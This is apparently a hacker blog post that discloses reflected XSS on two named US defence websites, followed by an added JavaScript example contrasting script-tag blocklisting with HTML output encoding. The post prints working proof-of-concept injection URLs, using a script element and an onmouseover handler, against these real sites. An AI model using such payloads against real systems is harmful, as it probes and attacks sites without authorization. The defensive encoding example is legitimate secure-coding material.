XSS in DFAS and Strategic Studies Institute

Well, after a series of explorations, “vinnu” bro has found several SQLi and XSS in US defence sites. Don't know why these people are so little concerned about their security. People say that they have a budget of over $100 million for cyber security. But I don’t see it being effective. Human knowledge belongs to the world, so we are sharing it through this blog. (Intended only for educational purposes.)

XSS in DFAS:

http://www.dfas.mil/srch/search?c=d1&searchview=d1&changequery=1&template=%2Fsearch.html&q=error%3Cscript%3Ealert%28’XSS+-+%5C%22vinnu%5C%22’%29%3C%2Fscript%3E&x=12&y=5

————————————————————————————————————————————————–

XSS in Strategic Studies Institute:

http://www.strategicstudiesinstitute.army.mil/pubs/tags.cfm?q=Record%3Chr%20onmouseover=javascript :alert(‘vinnu’)%3E

————————————————————————————————————————————————–
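Both URLs above carry markup in the reflected `q` parameter: one uses a script element, the other an event-handler attribute on an `<hr>`. The following added example (not from the original post; the template and function names are hypothetical, and the inputs are constructed to mirror the shape of the two `q` values) shows that a filter which only strips `<script>` tags leaves the second case open, while HTML-encoding the reflected value neutralizes both.

```javascript
// Constructed inputs with the decoded shape of the two reported `q` values.
const SAMPLES = {
  scriptElement: "error<script>alert(1)</script>",
  eventHandler: "Record<hr onmouseover=alert(1)>",
};

// Weak fix: a blocklist that only removes <script> elements.
function stripScriptTags(value) {
  return value.replace(/<script\b[^>]*>[\s\S]*?<\/script\s*>/gi, "");
}

// Output encoding for an HTML text node or a quoted attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hypothetical search-results template that reflects the query string.
function renderResults(query, transform) {
  return `<p>Results for: ${transform(query)}</p>`;
}

// True if the reflected part still contains something a browser parses as a tag.
function introducesMarkup(html) {
  const inner = html.replace(/^<p>/, "").replace(/<\/p>$/, "");
  return /<[a-z\/!]/i.test(inner);
}

// Run every sample through every handling strategy and record the outcome.
function audit() {
  const strategies = { none: (v) => v, blocklist: stripScriptTags, encode: escapeHtml };
  const report = {};
  for (const [name, fn] of Object.entries(strategies)) {
    report[name] = {};
    for (const [label, q] of Object.entries(SAMPLES)) {
      report[name][label] = introducesMarkup(renderResults(q, fn));
    }
  }
  return report;
}

console.log(audit());
```

The encoder shown is correct for HTML text and quoted-attribute contexts only; values reflected into script blocks, URLs or unquoted attributes need encoding for that context.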

Screen shots:

xss (DFAS)

xss (SSI)
